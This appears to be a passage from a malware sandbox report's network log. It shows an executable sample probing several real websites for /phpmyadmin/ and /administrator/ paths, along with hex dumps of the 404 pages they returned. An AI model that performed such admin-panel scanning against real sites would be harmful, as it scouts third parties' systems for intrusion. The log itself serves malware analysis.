                                                                                                                                                                                                    Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title><style> body {margin: 20px; font-family: helvetica, sans-serif; max-width: 800px;} .error {color: #e00;} pre {font-size: 16px;} h1 {f
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    128192.168.2.45780623.185.0.14436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC175OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: www.avient.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC925INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 35 35 34 32 37 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 38 36 34 30 30 2c 20 70 75 62 6c 69 63 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 45 74 61 67 3a 20 57 2f 22 31 37 30 30 39 37 37 31 38 37 22 0d 0a 45 78 70 69 72 65 73 3a 20 53 75 6e 2c 20 31 39 20 4e 6f 76 20 31 39 37 38 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 55427Cache-Control: max-age=86400, publicContent-Language: enContent-Type: text/html; charset=UTF-8Etag: W/"1700977187"Expires: Sun, 19 Nov 1978 05:00:00 GMTLast-Modified: Sun, 26 Nov
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1368INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 20 73 63 68 65 6d 61 3a 20 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" dir="ltr" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# schema: http://schema
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1368INData Raw: 69 6f 6e 49 44 3a 76 6f 69 64 20 30 2c 73 61 3a 76 6f 69 64 20 30 2c 71 75 65 75 65 54 69 6d 65 3a 76 6f 69 64 20 30 2c 61 70 70 6c 69 63 61 74 69 6f 6e 54 69 6d 65 3a 76 6f 69 64 20 30 2c 74 74 47 75 69 64 3a 76 6f 69 64 20 30 2c 75 73 65 72 3a 76 6f 69 64 20 30 2c 61 63 63 6f 75 6e 74 3a 76 6f 69 64 20 30 2c 70 72 6f 64 75 63 74 3a 76 6f 69 64 20 30 2c 65 78 74 72 61 3a 76 6f 69 64 20 30 2c 6a 73 41 74 74 72 69 62 75 74 65 73 3a 7b 7d 2c 75 73 65 72 41 74 74 72 69 62 75 74 65 73 3a 76 6f 69 64 20 30 2c 61 74 74 73 3a 76 6f 69 64 20 30 2c 74 72 61 6e 73 61 63 74 69 6f 6e 4e 61 6d 65 3a 76 6f 69 64 20 30 2c 74 4e 61 6d 65 50 6c 61 69 6e 3a 76 6f 69 64 20 30 7d 2c 6f 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 73 28 65 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20
                                                                                                                                                                                                    Data Ascii: ionID:void 0,sa:void 0,queueTime:void 0,applicationTime:void 0,ttGuid:void 0,user:void 0,account:void 0,product:void 0,extra:void 0,jsAttributes:{},userAttributes:void 0,atts:void 0,transactionName:void 0,tNamePlain:void 0},o={};function s(e){if(!e)throw
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1368INData Raw: 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 31 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 6d 65 74 72 69 63 73 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 61 63 74 69 6f 6e 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 33 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 76 69 65 77 5f 65 76 65 6e 74 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 76 69 65 77 5f 74 69 6d 69 6e 67 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 33 30 2c 6c 6f 6e 67 5f 74 61 73 6b 3a 21 31 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d
                                                                                                                                                                                                    Data Ascii: ed:!0,harvestTimeSeconds:10,autoStart:!0},metrics:{enabled:!0,autoStart:!0},page_action:{enabled:!0,harvestTimeSeconds:30,autoStart:!0},page_view_event:{enabled:!0,autoStart:!0},page_view_timing:{enabled:!0,harvestTimeSeconds:30,long_task:!1,autoStart:!0}
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1368INData Raw: 70 3d 22 41 6c 6c 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 62 6a 65 63 74 73 20 72 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74 69 66 69 65 72 21 22 3b 66 75 6e 63 74 69 6f 6e 20 68 28 65 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 70 29 3b 69 66 28 21 67 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 66 6f 72 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 77 61 73 20 6e 65 76 65 72 20 73 65 74 22 29 29 3b 72 65 74 75 72 6e 20 67 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 76 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 70 29 3b 67 5b 65 5d 3d 28 30 2c 69 2e 44 29 28 74 2c 66 28 29 29 3b 63 6f 6e 73 74 20 6e 3d 28 30
                                                                                                                                                                                                    Data Ascii: p="All configuration objects require an agent identifier!";function h(e){if(!e)throw new Error(p);if(!g[e])throw new Error("Configuration for ".concat(e," was never set"));return g[e]}function v(e,t){if(!e)throw new Error(p);g[e]=(0,i.D)(t,f());const n=(0
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1368INData Raw: 2c 45 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6a 28 65 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 41 6c 6c 20 72 75 6e 74 69 6d 65 20 6f 62 6a 65 63 74 73 20 72 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74 69 66 69 65 72 21 22 29 3b 69 66 28 21 45 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 52 75 6e 74 69 6d 65 20 66 6f 72 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 77 61 73 20 6e 65 76 65 72 20 73 65 74 22 29 29 3b 72 65 74 75 72 6e 20 45 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 54 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 41 6c 6c 20 72 75 6e 74 69 6d 65 20 6f 62 6a 65 63 74 73 20 72 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74
                                                                                                                                                                                                    Data Ascii: ,E={};function j(e){if(!e)throw new Error("All runtime objects require an agent identifier!");if(!E[e])throw new Error("Runtime for ".concat(e," was never set"));return E[e]}function T(e,t){if(!e)throw new Error("All runtime objects require an agent ident
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1368INData Raw: 3d 3e 61 2c 63 76 3a 28 29 3d 3e 6c 2c 69 53 3a 28 29 3d 3e 6f 2c 69 6c 3a 28 29 3d 3e 72 2c 75 78 3a 28 29 3d 3e 63 2c 76 36 3a 28 29 3d 3e 69 2c 77 31 3a 28 29 3d 3e 75 7d 29 3b 63 6f 6e 73 74 20 72 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 21 21 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2c 69 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 73 65 6c 66 2e 6e 61 76 69 67 61 74 6f 72 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 4e 61 76 69 67 61
                                                                                                                                                                                                    Data Ascii: =>a,cv:()=>l,iS:()=>o,il:()=>r,ux:()=>c,v6:()=>i,w1:()=>u});const r="undefined"!=typeof window&&!!window.document,i="undefined"!=typeof WorkerGlobalScope&&("undefined"!=typeof self&&self instanceof WorkerGlobalScope&&self.navigator instanceof WorkerNaviga
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1368INData Raw: 65 73 28 74 29 26 26 28 74 68 69 73 2e 73 68 61 72 65 64 43 6f 6e 74 65 78 74 5b 74 5d 3d 6e 29 7d 29 29 7d 63 61 74 63 68 28 65 29 7b 28 30 2c 72 2e 5a 29 28 22 41 6e 20 65 72 72 6f 72 20 6f 63 63 75 72 65 64 20 77 68 69 6c 65 20 73 65 74 74 69 6e 67 20 53 68 61 72 65 64 43 6f 6e 74 65 78 74 22 2c 65 29 7d 7d 7d 7d 2c 38 65 33 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 4c 3a 28 29 3d 3e 64 2c 52 3a 28 29 3d 3e 63 7d 29 3b 76 61 72 20 72 3d 6e 28 38 33 32 35 29 2c 69 3d 6e 28 31 32 38 34 29 2c 61 3d 6e 28 34 33 32 32 29 2c 6f 3d 6e 28 33 33 32 35 29 3b 63 6f 6e 73 74 20 73 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 29 7b 63 6f 6e 73 74 20 6e 3d 7b 73 74 61 67 65 64 3a 21 31 2c 70 72 69 6f 72 69
                                                                                                                                                                                                    Data Ascii: es(t)&&(this.sharedContext[t]=n)}))}catch(e){(0,r.Z)("An error occured while setting SharedContext",e)}}}},8e3:(e,t,n)=>{"use strict";n.d(t,{L:()=>d,R:()=>c});var r=n(8325),i=n(1284),a=n(4322),o=n(3325);const s={};function c(e,t){const n={staged:!1,priori
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1368INData Raw: 7b 7d 76 61 72 20 67 3d 7b 6f 6e 3a 68 2c 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3a 68 2c 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 72 5b 65 5d 3b 69 66 28 21 6e 29 72 65 74 75 72 6e 3b 66 6f 72 28 76 61 72 20 69 3d 30 3b 69 3c 6e 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 6e 5b 69 5d 3d 3d 3d 74 26 26 6e 2e 73 70 6c 69 63 65 28 69 2c 31 29 7d 2c 65 6d 69 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 2c 69 2c 61 29 7b 21 31 21 3d 3d 61 26 26 28 61 3d 21 30 29 3b 69 66 28 75 2e 61 62 6f 72 74 65 64 26 26 21 69 29 72 65 74 75 72 6e 3b 74 26 26 61 26 26 74 2e 65 6d 69 74 28 65 2c 6e 2c 72 29 3b 66 6f 72 28 76 61 72 20 6f 3d 70 28 72 29 2c 63 3d 76 28 65 29 2c 64 3d 63 2e 6c 65
                                                                                                                                                                                                    Data Ascii: {}var g={on:h,addEventListener:h,removeEventListener:function(e,t){var n=r[e];if(!n)return;for(var i=0;i<n.length;i++)n[i]===t&&n.splice(i,1)},emit:function(e,n,r,i,a){!1!==a&&(a=!0);if(u.aborted&&!i)return;t&&a&&t.emit(e,n,r);for(var o=p(r),c=v(e),d=c.le
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1368INData Raw: 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 62 50 3a 28 29 3d 3e 73 2c 69 7a 3a 28 29 3d 3e 63 2c 6d 24 3a 28 29 3d 3e 6f 7d 29 3b 76 61 72 20 72 3d 6e 28 33 38 35 29 3b 6c 65 74 20 69 3d 21 31 2c 61 3d 21 31 3b 74 72 79 7b 63 6f 6e 73 74 20 65 3d 7b 67 65 74 20 70 61 73 73 69 76 65 28 29 7b 72 65 74 75 72 6e 20 69 3d 21 30 2c 21 31 7d 2c 67 65 74 20 73 69 67 6e 61 6c 28 29 7b 72 65 74 75 72 6e 20 61 3d 21 30 2c 21 31 7d 7d 3b 72 2e 5f 41 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 65 73 74 22 2c 6e 75 6c 6c 2c 65 29 2c 72 2e 5f 41 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 65 73 74 22 2c 6e 75 6c 6c 2c 65 29 7d 63 61 74 63 68 28 65 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 69 7c 7c
                                                                                                                                                                                                    Data Ascii: rict";n.d(t,{bP:()=>s,iz:()=>c,m$:()=>o});var r=n(385);let i=!1,a=!1;try{const e={get passive(){return i=!0,!1},get signal(){return a=!0,!1}};r._A.addEventListener("test",null,e),r._A.removeEventListener("test",null,e)}catch(e){}function o(e,t){return i||


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    129192.168.2.45778013.32.208.274436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC181OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: www.perrisesd.org
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1145INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 30 36 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 33 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 0d 0a 53 65 72 76 65 72 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 49 49 53 2f 31 30 2e 30 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 3b 20 69 6e 63 6c 75 64 65 53 75 62 44 6f 6d 61 69 6e
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Content-Length: 3067Connection: closeDate: Sun, 26 Nov 2023 05:59:33 GMTCache-Control: privateServer: Microsoft-IIS/10.0Strict-Transport-Security: max-age=31536000; includeSubDomain
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC3067INData Raw: 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 53 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 65 72 72 69 73 65 73 64 2e 6f 72 67 2f 53 74 61 74 69 63 2f 2f 73 69 74 65 2f 61 73 73 65 74 73 2f 53 74 79 6c 65 73 2f 73 79 73 74 65 6d 5f 32 37 34 31 2e 63 73 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                                                                                                                                                                                    Data Ascii: <html><head> <link rel="Stylesheet" type="text/css" href="https://www.perrisesd.org/Static//site/assets/Styles/system_2741.css" /> <title>Error 404 - Page Not Found</title> <style type="text/css"> @font-face { font


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    130192.168.2.45766095.168.220.2104436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC224OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: www.beachrecruitment.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: OF=rbm97dnas60169fmufv15tpfb5
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC535INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 34 20 47 4d 54 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 74 72 61 6e 73 66 65 72 2d 65 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 6b 38 73 70 65 72 73 69 73 74 65 6e 74 3d 64 62 63 65 30 34 33 66 64 35 37 37 33 65 34 36 31 31 35 39 30 35 63 66 31 61 36 39 39 32 62 38 7c 31 31 66 31 38 37 36 33 38 36 34 33 65 31 33 64 37 62 64 31 39 36 33 39 39 31 66 61 63 35 32 62 3b 20 45 78 70 69 72 65 73 3d 54 75 65 2c 20 32 38 2d 4e 6f 76 2d 32 33 20 30 35 3a 35 39 3a 33 33 20 47
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not Founddate: Sun, 26 Nov 2023 05:59:34 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedset-cookie: k8spersistent=dbce043fd5773e46115905cf1a6992b8|11f187638643e13d7bd1963991fac52b; Expires=Tue, 28-Nov-23 05:59:33 G
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC10516INData Raw: 32 39 30 43 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6e 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 42 65 61 63 68 20 52 65 63 72 75 69 74 6d 65 6e 74 20 42 2e 56 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 63 72 69 70 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 4a 61 76 61 73 63 72 69 70 74 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 74 79 6c 65 2d 54 79 70 65 22 20
                                                                                                                                                                                                    Data Ascii: 290C<!DOCTYPE html><html lang="nl"><head><title>Beach Recruitment B.V.</title><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><meta http-equiv="Content-Script-Type" content="text/Javascript"><meta http-equiv="Content-Style-Type"
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC16293INData Raw: 33 46 39 44 0d 0a 65 73 3c 2f 53 54 52 49 4b 45 3e 3c 2f 41 3e 3c 2f 50 3e 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 21 2d 2d 4c 49 4e 4b 53 2d 2d 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 0a 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 67 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 77 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 09 0a 09 09 3c 64 69 76 20 69 64 3d 22 73 63 72 6f 6c 6c 64 6f 77 6e 22 3e 0a 20 20 20 20 20 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 73 63 72 6f 6c 6c 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 2f 68 65
                                                                                                                                                                                                    Data Ascii: 3F9Des</STRIKE></A></P></div></div></div>...LINKS--></div></div><div class="pager"><div class="sw"></div></div><div id="scrolldown"> <div class="icon-scroll"></div> </div></div></he
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    131192.168.2.45769772.167.58.1614436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC172OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: webstamp.ca
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC275INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 33 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 75 70 67 72 61 64 65 2d 69 6e 73 65 63 75 72 65 2d 72 65 71 75 65 73 74 73 3b 0d 0a 55 70 67 72 61 64 65 3a 20 68 32 2c 68 32 63 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 55 70 67 72 61 64 65 2c 20 63 6c 6f 73 65 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 74 65 6e 74
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:33 GMTServer: ApacheContent-Security-Policy: upgrade-insecure-requests;Upgrade: h2,h2cConnection: Upgrade, closeAccept-Ranges: bytesVary: Accept-EncodingTransfer-Encoding: chunkedContent
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC648INData Raw: 32 37 63 0d 0a 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 4f 4f 50 53 21 20 53 6f 6d 65 74 68 69 6e 67 20 77 65 6e 74 20 77 72 6f 6e 67 2e 20 54 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 68 61 73 20 62 65 65 6e 20 0d 0a 72 65 6d 6f 76 65 64 20 6f 72 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 75 6e 64 65 72 20 6d 61 69 6e 74 65 6e 61 6e 63 65 2e 0d 0a 46 65 65 6c 20 66 72 65 65 20 74 6f 20 72 65 61 64 20 74 68 65 20 6d 61 6e 79 20 6f 74 68 65 72 20 61 72 74 69 63 6c 65 73 20 61 76 61 69 6c 61 62 6c 65 20 61 74 20 0d 0a 68 74 74 70 73 3a 2f 2f 77 65 62 73 74 61 6d 70 2e 63 61 0d 0a 3c 21 2d 2d 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: 27c/phpmyadmin/OOPS! Something went wrong. The page you requested has been removed or is currently under maintenance.Feel free to read the many other articles available at https://webstamp.ca...


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    132192.168.2.45770381.19.159.644436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC184OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: www.grg17geblergasse.at
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
